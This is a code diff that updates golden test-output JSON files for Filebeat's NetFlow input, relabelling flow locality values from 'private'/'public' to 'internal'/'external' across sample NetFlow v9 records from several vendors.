@@ -926,7 +926,7 @@ }, "flow": { "id": "rAIv2psXy74", - "locality": "private" + "locality": "internal" }, "netflow": { "bgp_destination_as_number": 0, @@ -983,7 +983,7 @@ "source": { "bytes": 37557, "ip": "10.22.166.28", - "locality": "private", + "locality": "internal", "packets": 25, "port": 0 } @@ -997,7 +997,7 @@ "Fields": { "destination": { "ip": "10.22.202.15", - "locality": "private", + "locality": "internal", "port": 0 }, "event": { @@ -1016,7 +1016,7 @@ }, "flow": { "id": "lR18K-eSVNM", - "locality": "private" + "locality": "internal" }, "netflow": { "bgp_destination_as_number": 0, @@ -1073,7 +1073,7 @@ "source": { "bytes": 23676, "ip": "10.22.166.25", - "locality": "private", + "locality": "internal", "packets": 68, "port": 0 } @@ -1087,7 +1087,7 @@ "Fields": { "destination": { "ip": "10.20.166.26", - "locality": "private", + "locality": "internal", "port": 0 }, "event": { @@ -1106,7 +1106,7 @@ }, "flow": { "id": "1XCFo-Jv19g", - "locality": "private" + "locality": "internal" }, "netflow": { "bgp_destination_as_number": 0, @@ -1163,7 +1163,7 @@ "source": { "bytes": 22821, "ip": "10.22.166.25", - "locality": "private", + "locality": "internal", "packets": 30, "port": 0 } @@ -1177,7 +1177,7 @@ "Fields": { "destination": { "ip": "10.21.3.117", - "locality": "private", + "locality": "internal", "port": 0 }, "event": { @@ -1196,7 +1196,7 @@ }, "flow": { "id": "DkV-9Meb8W8", - "locality": "private" + "locality": "internal" }, "netflow": { "bgp_destination_as_number": 0, @@ -1253,7 +1253,7 @@ "source": { "bytes": 526, "ip": "10.22.166.12", - "locality": "private", + "locality": "internal", "packets": 2, "port": 0 } @@ -1267,7 +1267,7 @@ "Fields": { "destination": { "ip": "10.22.145.26", - "locality": "private", + "locality": "internal", "port": 0 }, "event": { @@ -1286,7 +1286,7 @@ }, "flow": { "id": "v1m_MeAqdL4", - "locality": "private" + "locality": "internal" }, "netflow": { "bgp_destination_as_number": 0, 
@@ -1343,7 +1343,7 @@ "source": { "bytes": 33129, "ip": "10.22.166.17", - "locality": "private", + "locality": "internal", "packets": 220, "port": 0 } @@ -1357,7 +1357,7 @@ "Fields": { "destination": { "ip": "10.21.75.38", - "locality": "private", + "locality": "internal", "port": 0 }, "event": { @@ -1376,7 +1376,7 @@ }, "flow": { "id": "ru0mPvG-tKw", - "locality": "private" + "locality": "internal" }, "netflow": { "bgp_destination_as_number": 0, @@ -1433,7 +1433,7 @@ "source": { "bytes": 5092, "ip": "10.22.166.36", - "locality": "private", + "locality": "internal", "packets": 9, "port": 0 } diff --git a/x-pack/filebeat/input/netflow/testdata/golden/Netflow-9-Huawei-Netstream.golden.json b/x-pack/filebeat/input/netflow/testdata/golden/Netflow-9-Huawei-Netstream.golden.json index 0afe853c1ec9..ac09cba74794 100644 --- a/x-pack/filebeat/input/netflow/testdata/golden/Netflow-9-Huawei-Netstream.golden.json +++ b/x-pack/filebeat/input/netflow/testdata/golden/Netflow-9-Huawei-Netstream.golden.json @@ -8,7 +8,7 @@ "destination": { "bytes": 0, "ip": "10.111.112.204", - "locality": "private", + "locality": "internal", "port": 2598 }, "event": { @@ -27,7 +27,7 @@ }, "flow": { "id": "d-FUjj8eKi8", - "locality": "private" + "locality": "internal" }, "netflow": { "bgp_destination_as_number": 0, @@ -84,7 +84,7 @@ "source": { "bytes": 200, "ip": "10.108.219.53", - "locality": "private", + "locality": "internal", "packets": 4, "port": 45587 } diff --git a/x-pack/filebeat/input/netflow/testdata/golden/Netflow-9-IE150-IE151.golden.json b/x-pack/filebeat/input/netflow/testdata/golden/Netflow-9-IE150-IE151.golden.json index 58ebb30be4c4..3aed82dc6f9b 100644 --- a/x-pack/filebeat/input/netflow/testdata/golden/Netflow-9-IE150-IE151.golden.json +++ b/x-pack/filebeat/input/netflow/testdata/golden/Netflow-9-IE150-IE151.golden.json @@ -7,7 +7,7 @@ "Fields": { "destination": { "ip": "192.168.0.2", - "locality": "private", + "locality": "internal", "port": 137 }, "event": { 
@@ -23,7 +23,7 @@ }, "flow": { "id": "X6k2SQeAX5c", - "locality": "private" + "locality": "internal" }, "netflow": { "destination_ipv4_address": "192.168.0.2", @@ -70,7 +70,7 @@ "source": { "bytes": 78, "ip": "192.168.0.3", - "locality": "private", + "locality": "internal", "packets": 1, "port": 137 } @@ -84,7 +84,7 @@ "Fields": { "destination": { "ip": "192.168.0.5", - "locality": "private", + "locality": "internal", "port": 6343 }, "event": { @@ -100,7 +100,7 @@ }, "flow": { "id": "XEzNKvE_H1k", - "locality": "private" + "locality": "internal" }, "netflow": { "destination_ipv4_address": "192.168.0.5", @@ -147,7 +147,7 @@ "source": { "bytes": 232, "ip": "192.168.0.4", - "locality": "private", + "locality": "internal", "packets": 1, "port": 58130 } diff --git a/x-pack/filebeat/input/netflow/testdata/golden/Netflow-9-Palo-Alto-1-flowset-in-large-zero-filled-packet.golden.json b/x-pack/filebeat/input/netflow/testdata/golden/Netflow-9-Palo-Alto-1-flowset-in-large-zero-filled-packet.golden.json index 5406a7ae845a..d0207ba3192b 100644 --- a/x-pack/filebeat/input/netflow/testdata/golden/Netflow-9-Palo-Alto-1-flowset-in-large-zero-filled-packet.golden.json +++ b/x-pack/filebeat/input/netflow/testdata/golden/Netflow-9-Palo-Alto-1-flowset-in-large-zero-filled-packet.golden.json @@ -7,7 +7,7 @@ "Fields": { "destination": { "ip": "134.220.1.156", - "locality": "public", + "locality": "external", "port": 50234 }, "event": { @@ -26,7 +26,7 @@ }, "flow": { "id": "A-NpGXd6eh4", - "locality": "public" + "locality": "external" }, "netflow": { "destination_ipv4_address": "134.220.1.156", @@ -76,7 +76,7 @@ "source": { "bytes": 363, "ip": "134.220.2.6", - "locality": "public", + "locality": "external", "packets": 3, "port": 88 } diff --git a/x-pack/filebeat/input/netflow/testdata/golden/Netflow-9-Palo-Alto-PAN--OS-with-app--id.golden.json b/x-pack/filebeat/input/netflow/testdata/golden/Netflow-9-Palo-Alto-PAN--OS-with-app--id.golden.json index 931c4a8e2767..79e31dd7f6b7 100644 
--- a/x-pack/filebeat/input/netflow/testdata/golden/Netflow-9-Palo-Alto-PAN--OS-with-app--id.golden.json +++ b/x-pack/filebeat/input/netflow/testdata/golden/Netflow-9-Palo-Alto-PAN--OS-with-app--id.golden.json @@ -7,7 +7,7 @@ "Fields": { "destination": { "ip": "10.32.91.205", - "locality": "private", + "locality": "internal", "port": 49519 }, "event": { @@ -26,7 +26,7 @@ }, "flow": { "id": "0HZ2F4aNlps", - "locality": "public" + "locality": "external" }, "netflow": { "destination_ipv4_address": "10.32.91.205", @@ -76,7 +76,7 @@ "source": { "bytes": 70, "ip": "23.35.171.27", - "locality": "public", + "locality": "external", "packets": 1, "port": 80 } @@ -90,7 +90,7 @@ "Fields": { "destination": { "ip": "162.115.24.30", - "locality": "public", + "locality": "external", "port": 443 }, "event": { @@ -109,7 +109,7 @@ }, "flow": { "id": "GTu1zsDt3yw", - "locality": "public" + "locality": "external" }, "netflow": { "destination_ipv4_address": "162.115.24.30", @@ -159,7 +159,7 @@ "source": { "bytes": 111, "ip": "10.32.105.103", - "locality": "private", + "locality": "internal", "packets": 1, "port": 39702 } @@ -173,7 +173,7 @@ "Fields": { "destination": { "ip": "34.202.173.126", - "locality": "public", + "locality": "external", "port": 443 }, "event": { @@ -192,7 +192,7 @@ }, "flow": { "id": "nUCuFEB8z_c", - "locality": "public" + "locality": "external" }, "netflow": { "destination_ipv4_address": "34.202.173.126", @@ -242,7 +242,7 @@ "source": { "bytes": 70, "ip": "10.32.144.145", - "locality": "private", + "locality": "internal", "packets": 1, "port": 52069 } @@ -256,7 +256,7 @@ "Fields": { "destination": { "ip": "10.130.145.44", - "locality": "private", + "locality": "internal", "port": 49449 }, "event": { @@ -275,7 +275,7 @@ }, "flow": { "id": "inYZm0Y9EVM", - "locality": "public" + "locality": "external" }, "netflow": { "destination_ipv4_address": "10.130.145.44", 
@@ -325,7 +325,7 @@ "source": { "bytes": 70, "ip": "23.209.52.99", - "locality": "public", + "locality": "external", "packets": 1, "port": 443 } @@ -339,7 +339,7 @@ "Fields": { "destination": { "ip": "10.50.96.20", - "locality": "private", + "locality": "internal", "port": 5432 }, "event": { @@ -358,7 +358,7 @@ }, "flow": { "id": "6vds_sLxXqE", - "locality": "private" + "locality": "internal" }, "netflow": { "destination_ipv4_address": "10.50.96.20", @@ -408,7 +408,7 @@ "source": { "bytes": 78, "ip": "10.50.97.57", - "locality": "private", + "locality": "internal", "packets": 1, "port": 55481 } @@ -422,7 +422,7 @@ "Fields": { "destination": { "ip": "10.50.97.57", - "locality": "private", + "locality": "internal", "port": 55481 }, "event": { @@ -441,7 +441,7 @@ }, "flow": { "id": "6vds_sLxXqE", - "locality": "private" + "locality": "internal" }, "netflow": { "destination_ipv4_address": "10.50.97.57", @@ -491,7 +491,7 @@ "source": { "bytes": 78, "ip": "10.50.96.20", - "locality": "private", + "locality": "internal", "packets": 1, "port": 5432 } @@ -505,7 +505,7 @@ "Fields": { "destination": { "ip": "10.48.208.209", - "locality": "private", + "locality": "internal", "port": 60068 }, "event": { @@ -524,7 +524,7 @@ }, "flow": { "id": "v3XVGdLaIe4", - "locality": "public" + "locality": "external" }, "netflow": { "destination_ipv4_address": "10.48.208.209", @@ -574,7 +574,7 @@ "source": { "bytes": 70, "ip": "34.234.173.147", - "locality": "public", + "locality": "external", "packets": 1, "port": 443 } @@ -588,7 +588,7 @@ "Fields": { "destination": { "ip": "65.52.108.254", - "locality": "public", + "locality": "external", "port": 443 }, "event": { @@ -607,7 +607,7 @@ }, "flow": { "id": "aenMB9Z5Tzc", - "locality": "public" + "locality": "external" }, "netflow": { "destination_ipv4_address": "65.52.108.254", @@ -657,7 +657,7 @@ "source": { "bytes": 70, "ip": "10.130.167.43", - "locality": "private", + "locality": "internal", "packets": 1, "port": 62196 } 
diff --git a/x-pack/filebeat/input/netflow/testdata/golden/Netflow-9-Streamcore.golden.json b/x-pack/filebeat/input/netflow/testdata/golden/Netflow-9-Streamcore.golden.json index 94d3ea85b2b9..1319ba663cc1 100644 --- a/x-pack/filebeat/input/netflow/testdata/golden/Netflow-9-Streamcore.golden.json +++ b/x-pack/filebeat/input/netflow/testdata/golden/Netflow-9-Streamcore.golden.json @@ -7,7 +7,7 @@ "Fields": { "destination": { "ip": "10.231.128.150", - "locality": "private", + "locality": "internal", "port": 50073 }, "event": { @@ -26,7 +26,7 @@ }, "flow": { "id": "wdxUeEaOBho", - "locality": "public" + "locality": "external" }, "netflow": { "destination_ipv4_address": "10.231.128.150", @@ -71,7 +71,7 @@ "source": { "bytes": 128, "ip": "100.78.40.201", - "locality": "public", + "locality": "external", "packets": 3, "port": 8080 } @@ -85,7 +85,7 @@ "Fields": { "destination": { "ip": "100.78.40.201", - "locality": "public", + "locality": "external", "port": 8080 }, "event": { @@ -104,7 +104,7 @@ }, "flow": { "id": "wdxUeEaOBho", - "locality": "public" + "locality": "external" }, "netflow": { "destination_ipv4_address": "100.78.40.201", @@ -149,7 +149,7 @@ "source": { "bytes": 172, "ip": "10.231.128.150", - "locality": "private", + "locality": "internal", "packets": 4, "port": 50073 } @@ -163,7 +163,7 @@ "Fields": { "destination": { "ip": "10.27.8.20", - "locality": "private", + "locality": "internal", "port": 53483 }, "event": { @@ -182,7 +182,7 @@ }, "flow": { "id": "6_Ia6lqx2cg", - "locality": "public" + "locality": "external" }, "netflow": { "destination_ipv4_address": "10.27.8.20", @@ -227,7 +227,7 @@ "source": { "bytes": 3943, "ip": "100.78.40.201", - "locality": "public", + "locality": "external", "packets": 10, "port": 8080 } @@ -241,7 +241,7 @@ "Fields": { "destination": { "ip": "100.78.40.201", - "locality": "public", + "locality": "external", "port": 8080 }, "event": { 
@@ -260,7 +260,7 @@ }, "flow": { "id": "6_Ia6lqx2cg", - "locality": "public" + "locality": "external" }, "netflow": { "destination_ipv4_address": "100.78.40.201", @@ -305,7 +305,7 @@ "source": { "bytes": 3052, "ip": "10.27.8.20", - "locality": "private", + "locality": "internal", "packets": 11, "port": 53483 } diff --git a/x-pack/filebeat/input/netflow/testdata/golden/Netflow-9-Ubiquiti-Edgerouter-with-MPLS-labels.golden.json b/x-pack/filebeat/input/netflow/testdata/golden/Netflow-9-Ubiquiti-Edgerouter-with-MPLS-labels.golden.json index 07680d7cffa6..e6cb0fb4112b 100644 --- a/x-pack/filebeat/input/netflow/testdata/golden/Netflow-9-Ubiquiti-Edgerouter-with-MPLS-labels.golden.json +++ b/x-pack/filebeat/input/netflow/testdata/golden/Netflow-9-Ubiquiti-Edgerouter-with-MPLS-labels.golden.json @@ -7,7 +7,7 @@ "Fields": { "destination": { "ip": "10.4.0.251", - "locality": "private", + "locality": "internal", "mac": "44:d9:e7:be:ef:89", "port": 17232 }, @@ -27,7 +27,7 @@ }, "flow": { "id": "KYJ6RiyA5YM", - "locality": "private" + "locality": "internal" }, "netflow": { "delta_flow_count": 0, @@ -79,7 +79,7 @@ "source": { "bytes": 174, "ip": "10.1.0.135", - "locality": "private", + "locality": "internal", "mac": "06:be:ef:be:ef:4f", "packets": 2, "port": 53 @@ -94,7 +94,7 @@ "Fields": { "destination": { "ip": "10.4.0.251", - "locality": "private", + "locality": "internal", "mac": "44:d9:e7:be:ef:89", "port": 17232 }, @@ -114,7 +114,7 @@ }, "flow": { "id": "4GHcyowN7sg", - "locality": "private" + "locality": "internal" }, "netflow": { "delta_flow_count": 0, @@ -166,7 +166,7 @@ "source": { "bytes": 87, "ip": "10.1.0.136", - "locality": "private", + "locality": "internal", "mac": "06:be:ef:be:ef:4f", "packets": 1, "port": 53 @@ -181,7 +181,7 @@ "Fields": { "destination": { "ip": "10.4.0.251", - "locality": "private", + "locality": "internal", "mac": "44:d9:e7:be:ef:89", "port": 51369 }, 
@@ -201,7 +201,7 @@ }, "flow": { "id": "GRn2z1Rao3c", - "locality": "private" + "locality": "internal" }, "netflow": { "delta_flow_count": 0, @@ -253,7 +253,7 @@ "source": { "bytes": 1920, "ip": "10.1.0.232", - "locality": "private", + "locality": "internal", "mac": "06:be:ef:be:ef:4f", "packets": 15, "port": 443 @@ -268,7 +268,7 @@ "Fields": { "destination": { "ip": "10.4.0.251", - "locality": "private", + "locality": "internal", "mac": "44:d9:e7:be:ef:89", "port": 51370 }, @@ -288,7 +288,7 @@ }, "flow": { "id": "iHA6jdIkqjA", - "locality": "private" + "locality": "internal" }, "netflow": { "delta_flow_count": 0, @@ -340,7 +340,7 @@ "source": { "bytes": 610, "ip": "10.1.0.232", - "locality": "private", + "locality": "internal", "mac": "06:be:ef:be:ef:4f", "packets": 8, "port": 443 @@ -355,7 +355,7 @@ "Fields": { "destination": { "ip": "10.4.0.251", - "locality": "private", + "locality": "internal", "mac": "44:d9:e7:be:ef:89", "port": 44006 }, @@ -375,7 +375,7 @@ }, "flow": { "id": "cBjtKefzGos", - "locality": "private" + "locality": "internal" }, "netflow": { "delta_flow_count": 0, @@ -427,7 +427,7 @@ "source": { "bytes": 2420, "ip": "10.5.0.91", - "locality": "private", + "locality": "internal", "mac": "06:be:ef:be:ef:4f", "packets": 21, "port": 443 @@ -442,7 +442,7 @@ "Fields": { "destination": { "ip": "10.4.0.251", - "locality": "private", + "locality": "internal", "mac": "44:d9:e7:be:ef:89", "port": 33282 }, @@ -462,7 +462,7 @@ }, "flow": { "id": "EzT0lQWYBRw", - "locality": "private" + "locality": "internal" }, "netflow": { "delta_flow_count": 0, @@ -514,7 +514,7 @@ "source": { "bytes": 10204, "ip": "10.1.0.30", - "locality": "private", + "locality": "internal", "mac": "06:be:ef:be:ef:4f", "packets": 30, "port": 443 @@ -529,7 +529,7 @@ "Fields": { "destination": { "ip": "10.4.0.251", - "locality": "private", + "locality": "internal", "mac": "44:d9:e7:be:ef:89", "port": 64642 }, 
@@ -549,7 +549,7 @@ }, "flow": { "id": "TROGwofkmJA", - "locality": "private" + "locality": "internal" }, "netflow": { "delta_flow_count": 0, @@ -601,7 +601,7 @@ "source": { "bytes": 216, "ip": "10.3.0.100", - "locality": "private", + "locality": "internal", "mac": "06:be:ef:be:ef:4f", "packets": 4, "port": 443 @@ -616,7 +616,7 @@ "Fields": { "destination": { "ip": "10.4.0.251", - "locality": "private", + "locality": "internal", "mac": "44:d9:e7:be:ef:89", "port": 9497 }, @@ -636,7 +636,7 @@ }, "flow": { "id": "wLclDbADA9s", - "locality": "private" + "locality": "internal" }, "netflow": { "delta_flow_count": 0, @@ -688,7 +688,7 @@ "source": { "bytes": 152, "ip": "10.1.0.135", - "locality": "private", + "locality": "internal", "mac": "06:be:ef:be:ef:4f", "packets": 1, "port": 53 @@ -703,7 +703,7 @@ "Fields": { "destination": { "ip": "10.0.0.73", - "locality": "private", + "locality": "internal", "port": 443 }, "event": { @@ -722,7 +722,7 @@ }, "flow": { "id": "LpdyE0SSB-o", - "locality": "private" + "locality": "internal" }, "netflow": { "delta_flow_count": 0, @@ -774,7 +774,7 @@ "source": { "bytes": 260, "ip": "192.168.1.98", - "locality": "private", + "locality": "internal", "packets": 5, "port": 55105 } @@ -788,7 +788,7 @@ "Fields": { "destination": { "ip": "255.255.255.255", - "locality": "private", + "locality": "internal", "port": 10001 }, "event": { @@ -807,7 +807,7 @@ }, "flow": { "id": "32P6av-L8P0", - "locality": "private" + "locality": "internal" }, "netflow": { "delta_flow_count": 0, @@ -859,7 +859,7 @@ "source": { "bytes": 32, "ip": "10.4.0.251", - "locality": "private", + "locality": "internal", "packets": 1, "port": 42506 } @@ -873,7 +873,7 @@ "Fields": { "destination": { "ip": "255.255.255.255", - "locality": "private", + "locality": "internal", "port": 37868 }, "event": { @@ -892,7 +892,7 @@ }, "flow": { "id": "ft_m5C7Hgpo", - "locality": "private" + "locality": "internal" }, "netflow": { "delta_flow_count": 0, 
@@ -944,7 +944,7 @@ "source": { "bytes": 135, "ip": "10.4.0.251", - "locality": "private", + "locality": "internal", "packets": 1, "port": 40295 } @@ -958,7 +958,7 @@ "Fields": { "destination": { "ip": "255.255.255.255", - "locality": "private", + "locality": "internal", "port": 56911 }, "event": { @@ -977,7 +977,7 @@ }, "flow": { "id": "bVX88Ii80AQ", - "locality": "private" + "locality": "internal" }, "netflow": { "delta_flow_count": 0, @@ -1029,7 +1029,7 @@ "source": { "bytes": 135, "ip": "10.4.0.251", - "locality": "private", + "locality": "internal", "packets": 1, "port": 36071 } @@ -1043,7 +1043,7 @@ "Fields": { "destination": { "ip": "255.255.255.255", - "locality": "private", + "locality": "internal", "port": 56327 }, "event": { @@ -1062,7 +1062,7 @@ }, "flow": { "id": "bA4nBN4veuI", - "locality": "private" + "locality": "internal" }, "netflow": { "delta_flow_count": 0, @@ -1114,7 +1114,7 @@ "source": { "bytes": 135, "ip": "10.4.0.251", - "locality": "private", + "locality": "internal", "packets": 1, "port": 49829 } @@ -1128,7 +1128,7 @@ "Fields": { "destination": { "ip": "255.255.255.255", - "locality": "private", + "locality": "internal", "port": 56239 }, "event": { @@ -1147,7 +1147,7 @@ }, "flow": { "id": "lY5yfRKXE3s", - "locality": "private" + "locality": "internal" }, "netflow": { "delta_flow_count": 0, @@ -1199,7 +1199,7 @@ "source": { "bytes": 135, "ip": "10.4.0.251", - "locality": "private", + "locality": "internal", "packets": 1, "port": 35059 } @@ -1213,7 +1213,7 @@ "Fields": { "destination": { "ip": "255.255.255.255", - "locality": "private", + "locality": "internal", "port": 39832 }, "event": { @@ -1232,7 +1232,7 @@ }, "flow": { "id": "x3GfEtY3zCQ", - "locality": "private" + "locality": "internal" }, "netflow": { "delta_flow_count": 0, @@ -1284,7 +1284,7 @@ "source": { "bytes": 135, "ip": "10.4.0.251", - "locality": "private", + "locality": "internal", "packets": 1, "port": 38231 } 
@@ -1298,7 +1298,7 @@ "Fields": { "destination": { "ip": "10.2.0.95", - "locality": "private", + "locality": "internal", "port": 443 }, "event": { @@ -1317,7 +1317,7 @@ }, "flow": { "id": "bfT831bq5AI", - "locality": "private" + "locality": "internal" }, "netflow": { "delta_flow_count": 0, @@ -1369,7 +1369,7 @@ "source": { "bytes": 3668, "ip": "192.168.1.102", - "locality": "private", + "locality": "internal", "packets": 21, "port": 47690 } diff --git a/x-pack/filebeat/input/netflow/testdata/golden/Netflow-9-field-layer2segmentid.golden.json b/x-pack/filebeat/input/netflow/testdata/golden/Netflow-9-field-layer2segmentid.golden.json index 1311a75ee5cb..879714e24c07 100644 --- a/x-pack/filebeat/input/netflow/testdata/golden/Netflow-9-field-layer2segmentid.golden.json +++ b/x-pack/filebeat/input/netflow/testdata/golden/Netflow-9-field-layer2segmentid.golden.json @@ -7,7 +7,7 @@ "Fields": { "destination": { "ip": "80.82.237.40", - "locality": "public", + "locality": "external", "port": 445 }, "event": { @@ -26,7 +26,7 @@ }, "flow": { "id": "tS3zN7t_rFg", - "locality": "public" + "locality": "external" }, "netflow": { "destination_ipv4_address": "80.82.237.40", @@ -75,7 +75,7 @@ "source": { "bytes": 52, "ip": "192.168.200.136", - "locality": "private", + "locality": "internal", "packets": 1, "port": 61926 } diff --git a/x-pack/filebeat/input/netflow/testdata/golden/Netflow-9-ipt_netflow-reduced-size-encoding.golden.json b/x-pack/filebeat/input/netflow/testdata/golden/Netflow-9-ipt_netflow-reduced-size-encoding.golden.json index 7675fa91b412..2b7dded5bd6a 100644 --- a/x-pack/filebeat/input/netflow/testdata/golden/Netflow-9-ipt_netflow-reduced-size-encoding.golden.json +++ b/x-pack/filebeat/input/netflow/testdata/golden/Netflow-9-ipt_netflow-reduced-size-encoding.golden.json @@ -7,7 +7,7 @@ "Fields": { "destination": { "ip": "193.151.198.166", - "locality": "public", + "locality": "external", "mac": "00:1b:21:bc:24:dd", "port": 36025 }, 
@@ -27,7 +27,7 @@ }, "flow": { "id": "XLC-7u3wi0U", - "locality": "public" + "locality": "external" }, "netflow": { "destination_ipv4_address": "193.151.198.166", @@ -79,7 +79,7 @@ "source": { "bytes": 156, "ip": "37.122.1.226", - "locality": "public", + "locality": "external", "mac": "90:e2:ba:23:09:fc", "packets": 3, "port": 27622 @@ -94,7 +94,7 @@ "Fields": { "destination": { "ip": "193.151.199.69", - "locality": "public", + "locality": "external", "mac": "00:1b:21:bc:24:dd", "port": 29598 }, @@ -114,7 +114,7 @@ }, "flow": { "id": "2mdiEm9z6pA", - "locality": "public" + "locality": "external" }, "netflow": { "destination_ipv4_address": "193.151.199.69", @@ -166,7 +166,7 @@ "source": { "bytes": 48, "ip": "5.141.231.166", - "locality": "public", + "locality": "external", "mac": "90:e2:ba:23:09:fc", "packets": 1, "port": 31178 @@ -181,7 +181,7 @@ "Fields": { "destination": { "ip": "212.224.113.74", - "locality": "public", + "locality": "external", "mac": "00:1b:21:bc:24:dc", "port": 443 }, @@ -201,7 +201,7 @@ }, "flow": { "id": "IKsDJxZK5UA", - "locality": "public" + "locality": "external" }, "netflow": { "destination_ipv4_address": "212.224.113.74", @@ -253,7 +253,7 @@ "source": { "bytes": 584, "ip": "10.233.128.4", - "locality": "private", + "locality": "internal", "mac": "00:04:96:97:b8:cd", "packets": 11, "port": 53688 @@ -268,7 +268,7 @@ "Fields": { "destination": { "ip": "10.236.8.4", - "locality": "private", + "locality": "internal", "mac": "00:1b:21:bc:24:dc", "port": 51549 }, @@ -288,7 +288,7 @@ }, "flow": { "id": "lfpS1KL7LwI", - "locality": "public" + "locality": "external" }, "netflow": { "destination_ipv4_address": "10.236.8.4", @@ -340,7 +340,7 @@ "source": { "bytes": 577, "ip": "193.151.192.46", - "locality": "public", + "locality": "external", "mac": "00:1a:4a:16:01:81", "packets": 4, "port": 80 
@@ -355,7 +355,7 @@ "Fields": { "destination": { "ip": "62.221.115.205", - "locality": "public", + "locality": "external", "mac": "00:1b:21:bc:24:dc", "port": 1024 }, @@ -375,7 +375,7 @@ }, "flow": { "id": "HRyho8QOr5M", - "locality": "public" + "locality": "external" }, "netflow": { "destination_ipv4_address": "62.221.115.205", @@ -427,7 +427,7 @@ "source": { "bytes": 152, "ip": "10.235.197.6", - "locality": "private", + "locality": "internal", "mac": "00:04:96:97:b8:cd", "packets": 3, "port": 57505 @@ -442,7 +442,7 @@ "Fields": { "destination": { "ip": "37.146.125.64", - "locality": "public", + "locality": "external", "mac": "00:1b:21:bc:24:dc", "port": 3237 }, @@ -462,7 +462,7 @@ }, "flow": { "id": "jbL3H_oK7ok", - "locality": "public" + "locality": "external" }, "netflow": { "destination_ipv4_address": "37.146.125.64", @@ -514,7 +514,7 @@ "source": { "bytes": 152, "ip": "10.236.31.7", - "locality": "private", + "locality": "internal", "mac": "00:04:96:97:b8:cd", "packets": 3, "port": 61471 @@ -529,7 +529,7 @@ "Fields": { "destination": { "ip": "52.198.214.72", - "locality": "public", + "locality": "external", "mac": "00:1b:21:bc:24:dc", "port": 443 }, @@ -549,7 +549,7 @@ }, "flow": { "id": "ayKjfr1z0QU", - "locality": "public" + "locality": "external" }, "netflow": { "destination_ipv4_address": "52.198.214.72", @@ -601,7 +601,7 @@ "source": { "bytes": 1809, "ip": "10.233.151.8", - "locality": "private", + "locality": "internal", "mac": "00:04:96:97:b8:cd", "packets": 15, "port": 58044 @@ -616,7 +616,7 @@ "Fields": { "destination": { "ip": "64.233.161.188", - "locality": "public", + "locality": "external", "mac": "00:1b:21:bc:24:dc", "port": 5228 }, @@ -636,7 +636,7 @@ }, "flow": { "id": "B15R8wv_tVI", - "locality": "public" + "locality": "external" }, "netflow": { "destination_ipv4_address": "64.233.161.188", 
@@ -688,7 +688,7 @@ "source": { "bytes": 234, "ip": "10.234.22.4", - "locality": "private", + "locality": "internal", "mac": "00:04:96:97:b8:cd", "packets": 3, "port": 60583 @@ -703,7 +703,7 @@ "Fields": { "destination": { "ip": "185.209.20.240", - "locality": "public", + "locality": "external", "mac": "00:1b:21:bc:24:dc", "port": 80 }, @@ -723,7 +723,7 @@ }, "flow": { "id": "oYN-uwp504w", - "locality": "public" + "locality": "external" }, "netflow": { "destination_ipv4_address": "185.209.20.240", @@ -775,7 +775,7 @@ "source": { "bytes": 1681, "ip": "10.233.36.7", - "locality": "private", + "locality": "internal", "mac": "00:04:96:97:b8:cd", "packets": 22, "port": 51399 @@ -790,7 +790,7 @@ "Fields": { "destination": { "ip": "84.39.245.175", - "locality": "public", + "locality": "external", "mac": "00:1b:21:bc:24:dc", "port": 18580 }, @@ -810,7 +810,7 @@ }, "flow": { "id": "MUPum_LUoxk", - "locality": "public" + "locality": "external" }, "netflow": { "destination_ipv4_address": "84.39.245.175", @@ -862,7 +862,7 @@ "source": { "bytes": 152, "ip": "10.233.200.7", - "locality": "private", + "locality": "internal", "mac": "00:04:96:97:b8:cd", "packets": 3, "port": 61820 @@ -877,7 +877,7 @@ "Fields": { "destination": { "ip": "10.232.8.45", - "locality": "private", + "locality": "internal", "mac": "00:1b:21:bc:24:dd", "port": 56257 }, @@ -897,7 +897,7 @@ }, "flow": { "id": "YStkNP0pV1E", - "locality": "public" + "locality": "external" }, "netflow": { "destination_ipv4_address": "10.232.8.45", @@ -949,7 +949,7 @@ "source": { "bytes": 1866, "ip": "23.43.139.27", - "locality": "public", + "locality": "external", "mac": "90:e2:ba:23:09:fc", "packets": 3, "port": 80 @@ -964,7 +964,7 @@ "Fields": { "destination": { "ip": "10.233.150.21", - "locality": "private", + "locality": "internal", "mac": "00:1b:21:bc:24:dd", "port": 38164 }, 
@@ -984,7 +984,7 @@ }, "flow": { "id": "nkastJ_vPI4", - "locality": "public" + "locality": "external" }, "netflow": { "destination_ipv4_address": "10.233.150.21", @@ -1036,7 +1036,7 @@ "source": { "bytes": 187, "ip": "2.17.140.47", - "locality": "public", + "locality": "external", "mac": "90:e2:ba:23:09:fc", "packets": 3, "port": 443 diff --git a/x-pack/filebeat/input/netflow/testdata/golden/Netflow-9-macaddress.golden.json b/x-pack/filebeat/input/netflow/testdata/golden/Netflow-9-macaddress.golden.json index 7f75a6ddf2ac..7db570f5db18 100644 --- a/x-pack/filebeat/input/netflow/testdata/golden/Netflow-9-macaddress.golden.json +++ b/x-pack/filebeat/input/netflow/testdata/golden/Netflow-9-macaddress.golden.json @@ -43,7 +43,7 @@ "Fields": { "destination": { "ip": "172.16.32.201", - "locality": "private", + "locality": "internal", "mac": "00:0c:29:70:86:09", "port": 22 }, @@ -60,7 +60,7 @@ }, "flow": { "id": "zQfsdfKgh-o", - "locality": "private" + "locality": "internal" }, "netflow": { "destination_ipv4_address": "172.16.32.201", @@ -96,7 +96,7 @@ }, "source": { "ip": "172.16.32.1", - "locality": "private", + "locality": "internal", "mac": "00:50:56:c0:00:01", "port": 65058 } @@ -110,7 +110,7 @@ "Fields": { "destination": { "ip": "172.16.32.100", - "locality": "private", + "locality": "internal", "mac": "00:0c:29:8d:af:c3", "port": 123 }, @@ -127,7 +127,7 @@ }, "flow": { "id": "Tw1iOKJ-dfE", - "locality": "private" + "locality": "internal" }, "netflow": { "destination_ipv4_address": "172.16.32.100", @@ -163,7 +163,7 @@ }, "source": { "ip": "172.16.32.201", - "locality": "private", + "locality": "internal", "mac": "00:0c:29:70:86:09", "port": 123 } @@ -177,7 +177,7 @@ "Fields": { "destination": { "ip": "172.16.32.201", - "locality": "private", + "locality": "internal", "mac": "00:0c:29:70:86:09", "port": 123 }, 
